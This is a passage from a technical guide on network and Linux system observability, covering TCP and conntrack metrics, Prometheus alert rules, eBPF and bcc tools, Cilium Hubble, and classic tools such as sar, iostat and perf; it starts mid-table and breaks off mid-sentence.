tracing backend (predecessor to Tempo)|Elasticsearch/Cassandra|Kubernetes|Apache 2.0|None| |Zipkin|Tracing|Distributed tracing backend (legacy)|MySQL/Elasticsearch|Container|Apache 2.0|None| |Falco|Security|Runtime security monitoring via eBPF/kernel module|Logs/SIEM|DaemonSet|Apache 2.0|Falco Cloud| |Cilium|Networking|eBPF-based networking with built-in observability|Prometheus/Hubble UI|Kubernetes DaemonSet|Apache 2.0|None| |Pixie|Observability|eBPF-based automatic K8s observability|In-cluster (ClickHouse)|Kubernetes|Apache 2.0|None| |k6|Testing|Load testing with observability integration|InfluxDB/Prometheus|CLI/Kubernetes|AGPL 3.0|Grafana Cloud| |Grafana OnCall|Incident Mgmt|On-call scheduling, escalation, incident response|PostgreSQL|Kubernetes|AGPL 3.0|Grafana Cloud| |Grafana Faro|Frontend|Real User Monitoring and browser telemetry|Loki + Tempo|JavaScript SDK|Apache 2.0|Grafana Cloud| |Parca|Profiling|Continuous profiling with eBPF|Object storage|Kubernetes|Apache 2.0|None| |VictoriaMetrics|Metrics|High-performance Prometheus-compatible storage|Local/object storage|Container|Apache 2.0 / Enterprise|None| |Cortex|Metrics|Multi-tenant Prometheus (Mimir predecessor)|Object storage|Kubernetes|Apache 2.0|None| |Signoz|Observability|Open-source APM (Prometheus + Tempo + logs unified)|ClickHouse|Kubernetes/Docker|Apache 2.0 / Enterprise|Signoz Cloud| |Hyperdx|Observability|Open-source APM (OTel-native)|ClickHouse|Docker|MIT|HyperDX Cloud| --- --- ## 21. Network Observability ### Why Network Observability Is a First-Class Concern Networks are the connective tissue of distributed systems. Every microservice call, every database query, every event published to a message queue traverses a network path. Yet network observability is consistently under-invested compared to application and infrastructure observability — teams instrument their services meticulously and leave the network between them as a black box. This creates blind spots that manifest repeatedly in production incidents. A database that appears slow from the application perspective may actually have perfectly healthy query execution times, with the delay entirely in the network path between the application and the database. A service that reports healthy metrics may be silently retransmitting 15% of its TCP segments, degrading throughput and adding latency that no application-level metric captures. A Kubernetes cluster that appears stable may have a single node with a failing NIC causing sporadic packet loss affecting all pods on that node. Network observability closes these gaps by making the behavior of the network path between components as visible as the behavior of the components themselves. ### Network Problems That Observability Detects |Network Issue|Description|Observable Signal|Impact| |---|---|---|---| |Packet loss|Packets dropped in network path (congestion, faulty hardware, firewall)|TCP retransmission rate, `node_network_receive_drop_total`|Latency spikes, throughput degradation, connection timeouts| |High RTT|Increased round-trip time due to distance, congestion, or routing|`node_network_transmit_bytes_total` rate drop, TCP RTT metrics|Application latency, timeout cascade| |Connection saturation|Exhausted TCP connection tables, port exhaustion, backlog overflow|conntrack count vs max, `node_sockstat_TCP_alloc`|New connections rejected, service unavailability| |TCP congestion|Congestion window reduction, slow start re-entry|`node_netstat_TcpExt_TCPSlowStartRetrans`|Throughput collapse on affected paths| |Retransmissions|Repeated packet delivery due to loss or timeout|`node_netstat_Tcp_RetransSegs` rate|Hidden latency, bandwidth waste| |Buffer bloat|Excessive queuing in network buffers causing latency|High RTT variance, throughput without loss|Latency unpredictability| |MTU mismatch|Fragmentation caused by differing MTU across path|ICMP fragmentation needed messages, packet count anomaly|Silent packet drops on VXLAN/overlay networks| |NIC errors|Hardware-level receive/transmit errors|`node_network_receive_errs_total`, `node_network_transmit_errs_total`|Silent data corruption risk, performance degradation| ### Critical Failure: MTU in Kubernetes Overlay Networks MTU mismatches are among the most insidious network problems in Kubernetes environments. VXLAN encapsulation (used by Flannel, Calico in VXLAN mode, and Weave) adds 50 bytes of overhead to each packet. If the underlying network has a standard 1500-byte MTU and the Kubernetes CNI is configured with a 1450-byte MTU (correctly accounting for VXLAN overhead), packets fit within the MTU without fragmentation. If the CNI MTU is misconfigured at 1500 bytes (matching the physical interface), packets with VXLAN encapsulation exceed the 1500-byte physical MTU. The result is either IP fragmentation (adding latency and CPU overhead) or silent packet drop if the path has DF (Don't Fragment) bit set. The failure mode is intermittent and load-dependent — small packets are unaffected, only large packets trigger the problem. This explains why services seem to work in testing (low-volume, small payloads) but degrade under production load (high-volume, large payloads). Detection: monitor `node_network_receive_drop_total` and watch for correlated TCP retransmission increases. ### TCP Metrics and Network Telemetry The Linux kernel tracks detailed TCP statistics in `/proc/net/netstat` and `/proc/net/snmp`. These statistics expose the internal behavior of the TCP stack, providing visibility that no application-level monitoring can match. |TCP Metric|Kernel Counter|Prometheus Metric|Meaning| |---|---|---|---| |RTT|Measured per connection by kernel|Available via eBPF tools, ss -ti|Per-connection round-trip time| |Retransmissions|`TcpExt_TCPRetransFail`, `Tcp_RetransSegs`|`node_netstat_Tcp_RetransSegs`|Packets resent due to loss/timeout| |Congestion window|Per-connection CWND|Available via eBPF, ss -ti|Current send window size| |SYN cookies|`TcpExt_SyncookiesSent`|`node_netstat_TcpExt_SyncookiesSent`|Backlog overflow events (attack or overload)| |OFO queue|`TcpExt_TCPOFOQueue`|`node_netstat_TcpExt_TCPOFOQueue`|Out-of-order packet reception| |Fast retransmits|`TcpExt_TCPFastRetrans`|`node_netstat_TcpExt_TCPFastRetrans`|SACK-based loss recovery| |Timeouts|`TcpExt_TCPTimeouts`|`node_netstat_TcpExt_TCPTimeouts`|RTO-based timeout retransmissions| |New connections|`Tcp_ActiveOpens`, `Tcp_PassiveOpens`|`node_netstat_Tcp_ActiveOpens`|Connection establishment rate| |Connection resets|`Tcp_EstabResets`|`node_netstat_Tcp_EstabResets`|Connections reset in ESTABLISHED state| **Interpreting retransmission rate:** ```promql # TCP retransmission rate per second rate(node_netstat_Tcp_RetransSegs[5m]) # Retransmission ratio (retransmits as % of total segments sent) rate(node_netstat_Tcp_RetransSegs[5m]) / rate(node_netstat_Tcp_OutSegs[5m]) ``` A retransmission ratio above 0.1% (1 in 1000 segments) indicates significant packet loss. Above 1% is a serious network health issue. Above 5% will cause application-visible latency and throughput degradation. **Detecting SYN backlog overflow:** ```promql # SYN cookies being sent = listen backlog is overflowing rate(node_netstat_TcpExt_SyncookiesSent[5m]) > 0 ``` If SYN cookies are being sent, the application's listen backlog is full. Connections are not being refused, but they are being processed through a slower path. This indicates either an attack (SYN flood) or a service that needs its `somaxconn` and `net.core.netdev_max_backlog` tuned. ### Network Interface Metrics with node_exporter node_exporter exposes per-interface metrics from `/proc/net/dev` with the `node_network_` prefix: ```promql # Network interface throughput (bytes per second) rate(node_network_receive_bytes_total{device!="lo"}[5m]) rate(node_network_transmit_bytes_total{device!="lo"}[5m]) # Interface utilization (assuming 1Gbps = 125MB/s interface) rate(node_network_receive_bytes_total{device="eth0"}[5m]) / 125000000 # Receive/transmit error rate rate(node_network_receive_errs_total{device="eth0"}[5m]) rate(node_network_transmit_errs_total{device="eth0"}[5m]) # Packet drop rate (distinct from errors — dropped by kernel, not rejected by hardware) rate(node_network_receive_drop_total{device="eth0"}[5m]) rate(node_network_transmit_drop_total{device="eth0"}[5m]) # Packet rate (for latency estimation from bytes + packets) rate(node_network_receive_packets_total{device="eth0"}[5m]) # Alert: receive errors > 0 on production interface - alert: NetworkInterfaceErrors expr: rate(node_network_receive_errs_total{device=~"eth.*|ens.*|bond.*"}[5m]) > 0 for: 5m labels: severity: warning annotations: summary: "Network errors on {{ $labels.instance }} interface {{ $labels.device }}" ``` ### Network Monitoring with Prometheus Exporters |Exporter|Deployment|Metrics Scope|Key Use Cases| |---|---|---|---| |node_exporter|DaemonSet / systemd|NIC throughput, errors, drops, TCP stats|Host-level network health| |blackbox_exporter|Central deployment|Endpoint availability, latency, TLS validity|External/internal connectivity probing| |snmp_exporter|Central deployment|Switch/router interface stats, VLAN metrics|Physical network device monitoring| |ebpf_exporter|DaemonSet (privileged)|Kernel-level TCP, socket, flow metrics|Deep packet-level observability| |ipvs_exporter|DaemonSet|Kubernetes service load balancer stats|kube-proxy IPVS table metrics| **blackbox_exporter for internal service probing:** The blackbox exporter is the correct tool for validating that network paths between services are healthy, independent of whether the services themselves are healthy. A successful application-level healthcheck does not prove that the network path is low-latency and reliable; a blackbox probe measures the round-trip including network traversal. ```yaml # Prometheus scrape config for internal network path probing - job_name: 'internal_tcp_probe' metrics_path: /probe params: module: [tcp_connect] static_configs: - targets: - postgres.payments.svc.cluster.local:5432 - redis.cache.svc.cluster.local:6379 - kafka.messaging.svc.cluster.local:9092 relabel_configs: - source_labels: [__address__] target_label: __param_target - source_labels: [__param_target] target_label: instance - target_label: __address__ replacement: blackbox-exporter:9115 # Key metrics from probe # probe_success: 0 = connection failed, 1 = success # probe_duration_seconds: total probe duration including TCP handshake # probe_tcp_duration_seconds: TCP connect time specifically ``` ```promql # Alert on failed internal connectivity - alert: InternalConnectivityFailed expr: probe_success{job="internal_tcp_probe"} == 0 for: 1m labels: severity: critical annotations: summary: "Cannot connect to {{ $labels.instance }}" # Alert on elevated TCP connect latency (network path degradation) - alert: InternalConnectivityHighLatency expr: probe_tcp_duration_seconds{job="internal_tcp_probe"} > 0.1 for: 5m labels: severity: warning annotations: summary: "TCP connect to {{ $labels.instance }} taking {{ $value }}s" ``` **snmp_exporter for physical network monitoring:** ```yaml # snmp.yml — Cisco interface monitoring modules: cisco_c9k: walk: - 1.3.6.1.2.1.2.2.1.2 # ifDescr - 1.3.6.1.2.1.2.2.1.5 # ifSpeed - 1.3.6.1.2.1.2.2.1.8 # ifOperStatus - 1.3.6.1.2.1.31.1.1.1.6 # ifHCInOctets (64-bit) - 1.3.6.1.2.1.31.1.1.1.10 # ifHCOutOctets (64-bit) - 1.3.6.1.2.1.2.2.1.14 # ifInErrors - 1.3.6.1.2.1.2.2.1.20 # ifOutErrors metrics: - name: ifHCInOctets oid: 1.3.6.1.2.1.31.1.1.1.6 type: counter help: "High-capacity counter for inbound octets" - name: ifOperStatus oid: 1.3.6.1.2.1.2.2.1.8 type: gauge help: "Current operational state: 1=up, 2=down, 7=lowerLayerDown" ``` ### Connection Tracking (conntrack) Linux's Netfilter connection tracking subsystem maintains state for every active and recently-closed network connection traversing the host. This state is used by the firewall (iptables/nftables) for stateful packet filtering, by NAT for address translation, and by Kubernetes kube-proxy for service load balancing. The conntrack table has a maximum size (`nf_conntrack_max`). When this limit is reached, new connections are dropped silently — without sending a TCP RST or ICMP error. This is one of the most operationally dangerous failure modes in high-traffic Linux systems because it produces no application-level error message; connections simply stop working. **Connection states:** |State|Meaning|Normal Duration| |---|---|---| |`NEW`|First packet seen, awaiting response|Milliseconds| |`SYN_SENT`|SYN sent, waiting for SYN-ACK|< 1 second (or timeout)| |`SYN_RECV`|SYN-ACK sent, waiting for ACK|< 1 second| |`ESTABLISHED`|Full three-way handshake complete, data flowing|Lifetime of connection| |`FIN_WAIT`|Local side sent FIN, half-closed|Seconds to minutes| |`CLOSE_WAIT`|Remote side sent FIN, waiting for local close|Depends on application| |`LAST_ACK`|Both FINs sent, waiting for final ACK|Seconds| |`TIME_WAIT`|Connection closed, waiting for delayed packets|60-120 seconds (2×MSL)| |`CLOSE`|Connection fully closed|Immediate| **TIME_WAIT accumulation** is a common operational issue. A service making many short-lived TCP connections (HTTP/1.1 without keepalive, or connection pooling disabled) will accumulate TIME_WAIT entries at the rate of its connection teardown frequency. At 10,000 connections/second, TIME_WAIT entries accumulate faster than the 60-second timeout can drain them, leading to port exhaustion and eventual connection failures. **Inspecting the conntrack table:** ```bash # List all tracked connections conntrack -L # Count by state conntrack -L | awk '{print $1}' | sort | uniq -c | sort -rn # Count entries by destination IP:port (find busy services) conntrack -L | grep ESTABLISHED | awk '{print $5}' | \ sed 's/dst=//' | sort | uniq -c | sort -rn | head -20 # Watch conntrack table in real time watch -n1 'conntrack -L 2>/dev/null | wc -l' # Low-level view directly from kernel cat /proc/net/nf_conntrack | head -5 # tcp 6 431999 ESTABLISHED src=10.0.0.1 dst=10.0.0.50 sport=54321 dport=5432 \ # src=10.0.0.50 dst=10.0.0.1 sport=5432 dport=54321 [ASSURED] mark=0 use=1 # Current vs maximum conntrack entries cat /proc/sys/net/netfilter/nf_conntrack_count cat /proc/sys/net/netfilter/nf_conntrack_max ``` **Monitoring conntrack saturation with node_exporter:** ```promql # Current conntrack entries node_nf_conntrack_entries # Maximum conntrack entries node_nf_conntrack_entries_limit # Conntrack utilization (alert at 70% to prevent silent drops) node_nf_conntrack_entries / node_nf_conntrack_entries_limit # Alert rule - alert: ConntrackTableNearSaturation expr: | node_nf_conntrack_entries / node_nf_conntrack_entries_limit > 0.75 for: 5m labels: severity: warning annotations: summary: "conntrack table {{ $value | humanizePercentage }} full on {{ $labels.instance }}" description: "At current rate, connection drops may begin soon. Tune nf_conntrack_max or investigate connection leak." runbook_url: "https://runbooks.internal/conntrack-saturation" # Critical — new connections are being dropped - alert: ConntrackTableFull expr: | node_nf_conntrack_entries / node_nf_conntrack_entries_limit > 0.95 for: 1m labels: severity: critical ``` **Tuning conntrack for high-traffic environments:** ```bash # Increase conntrack table size (requires root; persist in /etc/sysctl.d/) sysctl -w net.netfilter.nf_conntrack_max=2097152 sysctl -w net.netfilter.nf_conntrack_buckets=524288 # Reduce TIME_WAIT timeout for connection-heavy services sysctl -w net.netfilter.nf_conntrack_tcp_timeout_time_wait=30 sysctl -w net.netfilter.nf_conntrack_tcp_timeout_established=86400 # For services not needing conntrack (internal load-balanced services): # Use NOTRACK rules to skip conntrack entirely iptables -t raw -A PREROUTING -p tcp --dport 8080 -j NOTRACK iptables -t raw -A OUTPUT -p tcp --sport 8080 -j NOTRACK ``` ### eBPF Network Observability eBPF (extended Berkeley Packet Filter) enables network observability at the kernel level with minimal overhead. Unlike traditional packet capture (which copies packets to userspace) or socket-based monitoring (which requires inserting monitoring code into the data path), eBPF programs run in the kernel itself, executing on every network event with near-zero overhead compared to alternative approaches. **How eBPF network observability works:** 1. An eBPF program is loaded into the kernel and attached to a hook point (tracepoint, kprobe, XDP hook, or tc hook) 2. When the hook point is triggered (e.g., a TCP connection is established), the eBPF program executes 3. The program can read kernel data structures (socket buffers, TCP control blocks, routing tables) and write to eBPF maps (shared memory accessible from userspace) 4. A userspace collector reads the eBPF maps and exports the data as Prometheus metrics This mechanism can observe every TCP connection establishment and teardown, every DNS query, every HTTP/2 frame (without TLS termination), every syscall, and every network packet — at kernel speeds without modifying application code. **Key eBPF network tools:** |Tool|Origin|Purpose|Use in Observability| |---|---|---|---| |`tcpconnect` (bcc)|BCC tools|Traces every TCP connection establishment|Connection rate analysis, unexpected connections| |`tcpretrans` (bcc)|BCC tools|Traces TCP retransmissions with addresses|Per-connection retransmit identification| |`tcptop` (bcc)|BCC tools|Live TCP throughput by process and connection|Find bandwidth-consuming processes| |`tcplife` (bcc)|BCC tools|Complete TCP session lifecycle with duration and bytes|Connection duration analysis| |`netlatency` (bpftrace)|bpftrace|Per-socket network latency|RTT distribution without tcpdump overhead| |`xdp-filter`|XDP/eBPF|High-speed packet filtering at NIC driver|DDoS mitigation, L3/L4 filtering| |Cilium Hubble|Cilium|Full L3-L7 network observability for Kubernetes|Service mesh traffic visibility| |Pixie|New Relic OSS|Automatic Kubernetes observability via eBPF|Protocol-level traffic analysis without instrumentation| **Using bcc tools for production network debugging:** ```bash # Trace all new TCP connections with source/dest/PID /usr/share/bcc/tools/tcpconnect -t # TIME(s) PID COMM IP SADDR DADDR SPORT DPORT # 0.000 15234 payment-svc 4 10.0.1.45 10.0.2.12 54321 5432 # 0.001 15234 payment-svc 4 10.0.1.45 10.0.0.5 54322 6379 # Trace TCP retransmissions (identify flaky paths) /usr/share/bcc/tools/tcpretrans # TIME PID IP LADDR:LPORT T> RADDR:RPORT STATE # 14:23:01 0 4 10.0.1.45:54321 R> 10.0.2.12:5432 ESTABLISHED # 14:23:01 0 4 10.0.1.45:54321 R> 10.0.2.12:5432 ESTABLISHED # Watch DNS queries (find unexpected DNS resolution or slow lookups) /usr/share/bcc/tools/dns_latency # Avg: 0.23ms P99: 12ms Timeouts: 0 # Monitor TCP connection lifetimes /usr/share/bcc/tools/tcplife # PID COMM LADDR LPORT RADDR RPORT TX_KB RX_KB MS # 15234 payment 10.0.1.45 54321 10.0.2.12 5432 1.2 45.6 342.1 ``` **bpftrace for custom network probes:** ```bash # Measure per-connection TCP RTT in real time bpftrace -e ' tracepoint:tcp:tcp_probe { @rtt_us = hist(args->srtt_us >> 3); } interval:s:5 { print(@rtt_us); clear(@rtt_us); }' # Count connections by destination IP (find unexpected egress) bpftrace -e ' kprobe:tcp_connect { $sk = (struct sock *)arg0; $daddr = ntop(AF_INET, $sk->__sk_common.skc_daddr); @connections[$daddr] = count(); } interval:s:30 { print(@connections); clear(@connections); }' ``` **ebpf_exporter for Prometheus integration:** The `ebpf_exporter` by Cloudflare bridges eBPF metrics into Prometheus, allowing kernel-level network observability data to appear in Grafana dashboards alongside application metrics: ```yaml # ebpf_exporter config programs: - name: tcp_retransmits metrics: histograms: - name: tcp_retransmits_by_process help: TCP retransmit events by process name labels: - name: comm size: 16 decoders: - name: string code: | #include <net/sock.h> BPF_HISTOGRAM(retransmits, u64); int kprobe__tcp_retransmit_skb(struct pt_regs *ctx, struct sock *sk, ...) { retransmits.increment(1); return 0; } ``` ### Cilium Hubble: Service Mesh Network Observability When Cilium is used as the Kubernetes CNI, Hubble provides L3/L4/L7 network observability across the entire cluster: ```bash # Install Hubble CLI export HUBBLE_VERSION=$(curl -s https://raw.githubusercontent.com/cilium/hubble/master/stable.txt) curl -L --remote-name-all https://github.com/cilium/hubble/releases/download/$HUBBLE_VERSION/hubble-linux-amd64.tar.gz # Watch real-time traffic flows hubble observe --follow # Filter to a specific namespace hubble observe --namespace payments --follow # Show HTTP-level details hubble observe --protocol http --follow # Identify dropped connections (policy violations) hubble observe --verdict DROPPED --follow # Jun 15 14:23:01.123: payments/payment-service:54321 → database/postgres:5432 # DROPPED (Policy denied) # Generate service dependency map hubble observe --output json | \ jq -r '[.source.namespace, .source.workload, .destination.namespace, .destination.workload] | @csv' | \ sort -u ``` Hubble metrics are automatically exported to Prometheus: ```promql # L7 HTTP error rate per service pair (from Hubble) sum(rate(hubble_flows_processed_total{ verdict="DROPPED", namespace="payments" }[5m])) by (source, destination) # TCP connection rate between services sum(rate(hubble_tcp_flags_total{ flag="SYN", namespace="payments" }[5m])) by (source, destination) ``` ### Network Observability Troubleshooting Workflow The following workflow provides a systematic approach to network-related incident investigation: ``` [1] High latency or error rate detected (metrics alert) │ ▼ [2] Determine if network path is affected ├── Check blackbox_exporter probe latency between services ├── Query: probe_tcp_duration_seconds — elevated? └── Query: probe_success == 0 — any paths down? │ ▼ [3] Inspect network interface health ├── node_network_receive_errs_total — hardware errors? ├── node_network_receive_drop_total — kernel drops? └── node_network_receive_bytes_total rate — saturation? │ ▼ [4] Analyze TCP layer ├── node_netstat_Tcp_RetransSegs rate — high retransmits? ├── node_netstat_TcpExt_TCPTimeouts — timeout retransmits? ├── node_netstat_TcpExt_SyncookiesSent > 0 — backlog overflow? └── ss -s — socket summary (TIME_WAIT count, ESTABLISHED count) │ ▼ [5] Check connection tracking ├── node_nf_conntrack_entries / limit — table saturation? ├── conntrack -L | wc -l — absolute count └── conntrack -L | grep TIME_WAIT | wc -l — TIME_WAIT accumulation? │ ▼ [6] eBPF-level investigation (if issue unresolved) ├── tcpretrans — which connections are retransmitting? ├── tcpconnect — unexpected connection patterns? ├── bpftrace RTT probe — per-connection latency distribution └── tcpdump (short capture) — packet-level validation │ ▼ [7] Infrastructure layer ├── Check NIC driver errors (ethtool -S eth0) ├── Check SNMP exporter for upstream switch errors ├── Verify MTU consistency: ip link show — same across path? └── For Kubernetes: check CNI plugin logs, VXLAN overhead │ ▼ [8] Identify and remediate root cause ├── MTU mismatch → align CNI and physical MTU ├── conntrack saturation → tune nf_conntrack_max, add NOTRACK ├── NIC errors → replace hardware, update driver ├── TIME_WAIT exhaustion → enable SO_REUSEADDR, tune tcp_tw_reuse └── Backlog overflow → increase net.core.somaxconn, application backlog ``` --- ## 22. Linux System Observability ### Why Linux Observability Is Essential Every workload in a cloud-native environment ultimately runs on a Linux kernel. Container runtime, Kubernetes kubelet, application processes — all of these are Linux processes consuming Linux kernel resources. Application-level observability tells you what the application is doing; Linux system observability tells you whether the operating system supporting the application is healthy. The combination is required for complete incident investigation coverage. An application experiencing increased latency might be: - Waiting for I/O (visible in iostat, `iowait` CPU metric, `/proc/diskstats`) - Throttled by the CPU scheduler (visible in cgroup CPU metrics, `cpu.stat throttled_time`) - Waiting for memory allocation (visible in `/proc/meminfo` memory pressure indicators) - Competing for file descriptors (`/proc/sys/fs/file-nr` vs limit) - Delayed by system calls being traced or blocked (visible in strace, perf, eBPF) None of these would produce a direct application error. All would produce elevated latency. Without Linux system observability, the investigation stops at "the application is slow" without the ability to identify why. ### Linux Telemetry Sources The Linux kernel exposes its internal state through a hierarchy of virtual filesystems and interfaces: |Source|Type|Description|Refresh Rate|Primary Consumer| |---|---|---|---|---| |`/proc`|Virtual filesystem|Process and kernel runtime statistics|Per-read (real-time)|node_exporter, ps, top| |`/sys`|Virtual filesystem|Kernel configuration and device attributes|Per-read|node_exporter, udevadm| |`cgroups v2`|Virtual filesystem|Resource accounting and limits per process group|Per-read|Kubernetes, node_exporter| |`netfilter`|Kernel subsystem|Network connection tracking and firewall statistics|Per-read via /proc|node_exporter, conntrack| |`perf_events`|Syscall interface|Hardware performance counters, software events, tracepoints|Sampling-based|perf, BCC tools| |`ftrace`|Kernel tracing|Function-level kernel tracing|Continuous|trace-cmd, perf-ftrace| |`kprobes/uprobes`|Dynamic instrumentation|Dynamic attachment to kernel/user functions|On-demand|eBPF, SystemTap| |`tracepoints`|Static instrumentation|Pre-defined kernel trace hooks|On-demand|eBPF, perf, LTTng| |`IPMI/BMC`|Hardware interface|Hardware health (temperature, fan, power)|Polled|ipmi_exporter| ### /proc Filesystem Deep Dive The `/proc` filesystem is the primary interface between observability tools and the Linux kernel. Every major Linux metrics exporter reads from `/proc`. **Critical /proc paths for observability:** |Path|Content|Key Data|Tool| |---|---|---|---| |`/proc/stat`|CPU time per state per core|user, system, iowait, steal, idle|node_exporter: `node_cpu_seconds_total`| |`/proc/meminfo`|Memory subsystem statistics|MemTotal, MemFree, MemAvailable, Cached, Buffers, SwapUsed|node_exporter: `node_memory_*`| |`/proc/loadavg`|System load averages|1/5/15 minute load, runnable/total processes|node_exporter: `node_load1/5/15`| |`/proc/diskstats`|Block device I/O statistics|reads/writes, sectors, I/O time|node_exporter: `node_disk_*`| |`/proc/net/dev`|Network interface statistics|bytes/packets/errors/drops per interface|node_exporter: `node_network_*`| |`/proc/net/tcp`|TCP socket table|all TCP connections with state and address|ss, netstat| |`/proc/net/snmp`|SNMP MIB-II network statistics|TCP/UDP/IP counters|node_exporter: `node_netstat_*`| |`/proc/net/netstat`|Extended TCP statistics|Detailed TCP event counters|node_exporter: `node_netstat_TcpExt_*`| |`/proc/sys/net/netfilter/nf_conntrack_count`|Current conntrack entries|Active connection count|node_exporter: `node_nf_conntrack_entries`| |`/proc/sys/fs/file-nr`|File descriptor usage|Allocated, unused, max FDs|node_exporter: `node_filefd_allocated`| |`/proc/[pid]/stat`|Per-process statistics|CPU time, memory, state, threads|node_exporter: `node_processes_*`| |`/proc/[pid]/fd/`|Per-process open file descriptors|Count of open FDs per process|lsof| |`/proc/buddyinfo`|Kernel memory fragmentation|Available memory per order per zone|Useful for large allocation failure diagnosis| |`/proc/vmstat`|Virtual memory statistics|Page faults, swaps, compaction events|node_exporter: `node_vmstat_*`| |`/proc/interrupts`|Hardware interrupt counts|Interrupts per CPU per source|Useful for IRQ imbalance diagnosis| **Reading /proc directly:** ```bash # CPU utilization (parse /proc/stat) # Format: cpu user nice system idle iowait irq softirq steal guest guest_nice cat /proc/stat | head -5 # Memory pressure (available vs total) awk '/MemAvailable|MemTotal/{print $1, $2, $3}' /proc/meminfo # MemTotal: 32768000 kB # MemAvailable: 8192000 kB # System load cat /proc/loadavg # 2.45 2.12 1.87 3/1245 15234 # (1min) (5min) (15min) (running/total) (last pid) # All TCP connections with state cat /proc/net/tcp | head -5 # sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode # 0: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 ... # (hex encoded addresses, st=0A means LISTEN) # File descriptor usage cat /proc/sys/fs/file-nr # 21504 0 9223372036854775807 # (allocated, unused, max) ``` ### Classic Linux Performance Tools **top / htop** `top` provides a live view of the system's most resource-consuming processes, system load averages, and CPU/memory overview. For observability purposes, the key metrics: - **%us (user):** CPU time in user-space processes. High user% with high application latency indicates CPU-bound workload. - **%sy (system):** CPU time in kernel context. Elevated system% indicates heavy syscall activity, I/O operations, or kernel work. - **%wa (iowait):** CPU time waiting for I/O completion. Elevated iowait indicates the CPU is underutilized because processes are blocked on disk or network I/O. - **%st (steal):** CPU cycles stolen by the hypervisor in virtualized environments. Elevated steal indicates host CPU overcommitment — the VM is not getting the CPU it requests. - **load average:** 1/5/15 minute averages of the number of processes in runnable or uninterruptible state. A load average consistently greater than the CPU count indicates saturation. ```bash # Non-interactive top snapshot (3 iterations, 1 second interval) top -b -n 3 -d 1 # Watch specific process top -p $(pgrep payment-service) # Sort by memory top -o %MEM # htop with per-CPU bars, tree view, and filtering htop --tree ``` **sar (System Activity Reporter)** `sar` collects, reports, and saves system activity information. It is particularly valuable for historical performance analysis — when an incident occurred at 2am, `sar` data from that time provides the OS-level context. ```bash # CPU utilization (every 2 seconds, 5 times) sar -u 2 5 # Time CPU %user %nice %system %iowait %steal %idle # 14:23:01 all 45.23 0.00 12.45 8.90 0.00 33.42 # Memory usage sar -r 2 5 # Time kbmemfree kbavail kbmemused %memused kbbuffers kbcached # 14:23:01 512000 2048000 30720000 93.75 131072 8192000 # Network interface throughput sar -n DEV 2 5 # Time IFACE rxpck/s txpck/s rxkB/s txkB/s # 14:23:01 eth0 45678.0 23456.0 5432.1 1234.5 # Disk I/O statistics sar -b 2 5 # Time tps rtps wtps bread/s bwrtn/s # 14:23:01 1234.0 456.0 778.0 23456.0 45678.0 # Historical CPU from sar data files sar -u -f /var/log/sysstat/sa$(date +%d -d yesterday) ``` **iostat** `iostat` reports CPU utilization and I/O statistics for block devices. It is the primary tool for diagnosing disk I/O bottlenecks. ```bash # Extended device statistics, 1-second interval iostat -x 1 # Key output fields: # r/s, w/s — Read/write operations per second (IOPS) # rkB/s, wkB/s — Read/write throughput in KB/s # await — Average I/O service time in milliseconds # r_await — Average read latency # w_await — Average write latency # %util — Percentage of time device was busy (100% = saturated) # svctm — Average service time (deprecated, use await) # avgqu-sz — Average I/O queue depth # Example output showing a saturated disk: # Device r/s w/s rkB/s wkB/s await %util # nvme0n1 12345.0 678.0 98765.0 5432.0 18.5 98.2 ← 98% util, 18ms await ``` **Prometheus metrics equivalent of iostat:** ```promql # IOPS (reads per second) rate(node_disk_reads_completed_total{device="nvme0n1"}[5m]) # Write throughput (bytes per second) rate(node_disk_written_bytes_total{device="nvme0n1"}[5m]) # Average I/O latency (await equivalent) rate(node_disk_io_time_seconds_total{device="nvme0n1"}[5m]) / (rate(node_disk_reads_completed_total{device="nvme0n1"}[5m]) + rate(node_disk_writes_completed_total{device="nvme0n1"}[5m])) # Disk utilization rate(node_disk_io_time_seconds_total{device="nvme0n1"}[5m]) # Alert on disk approaching saturation - alert: DiskIOUtilizationHigh expr: rate(node_disk_io_time_seconds_total[5m]) > 0.9 for: 10m labels: severity: warning annotations: summary: "Disk {{ $labels.device }} on {{ $labels.instance }} utilization > 90%" ``` |Metric|/proc Source|node_exporter Metric|iostat Equivalent|Meaning| |---|---|---|---|---| |Read IOPS|`/proc/diskstats` col 4|`rate(node_disk_reads_completed_total[5m])`|`r/s`|Read operations per second| |Write IOPS|`/proc/diskstats` col 8|`rate(node_disk_writes_completed_total[5m])`|`w/s`|Write operations per second| |Read throughput|`/proc/diskstats` col 6|`rate(node_disk_read_bytes_total[5m])`|`rkB/s`|Read bandwidth| |Write throughput|`/proc/diskstats` col 10|`rate(node_disk_written_bytes_total[5m])`|`wkB/s`|Write bandwidth| |I/O time|`/proc/diskstats` col 13|`rate(node_disk_io_time_seconds_total[5m])`|`%util / 100`|Fraction of time device busy| |I/O queue depth|`/proc/diskstats` col 14|`node_disk_io_time_weighted_seconds_total`|`avgqu-sz`|Average request queue depth| |I/O latency|Derived|io_time / (reads + writes)|`await`|Average I/O service time| **perf** `perf` is the Linux performance analysis framework. It interfaces with hardware performance counters (PMU), software events, and kernel tracepoints to provide function-level profiling without application code modification. ```bash # Live per-process CPU usage at function level perf top # Record 10 seconds of all-process CPU profiling perf record -F 99 -a -g -- sleep 10 # Generate text report of hottest functions perf report --stdio | head -30 # Generate FlameGraph data (with Brendan Gregg's FlameGraph scripts) perf script | stackcollapse-perf.pl | flamegraph.pl > cpu_flamegraph.svg # Profile specific process perf record -F 99 -p $(pgrep payment-service) -g -- sleep 30 perf report --stdio # Count hardware events (cache misses, branch mispredictions) perf stat -e cache-misses,cache-references,branch-misses,instructions \ -p $(pgrep payment-service) -- sleep 10 ``` CPU flame graphs produced by `perf` are the most effective tool for identifying CPU-bound performance problems. They show the exact call stacks consuming CPU time, weighted by the fraction of samples where each frame was on the stack. A wide bar at the top of the flame graph indicates a hot code path. Finding the widest top-level function and optimizing it produces the largest performance improvement. ### cgroups v2 Observability Kubernetes uses cgroups v2 (on modern nodes) to enforce resource limits on containers. cgroup accounting provides per-container metrics independent of the container runtime: ```bash # Find the cgroup path for a Kubernetes pod systemd-cgls | grep -A2 payment-service # Read CPU statistics for a container's cgroup cat /sys/fs/cgroup/kubepods/pod<uid>/<container-id>/cpu.stat # usage_usec 1234567890 ← Total CPU time consumed # user_usec 987654321 ← User-space CPU time # system_usec 246913569 ← Kernel-space CPU time # nr_periods 9876543 ← Number of scheduler periods # nr_throttled 1234 ← Periods where container was throttled # throttled_usec 12345678 ← Total time 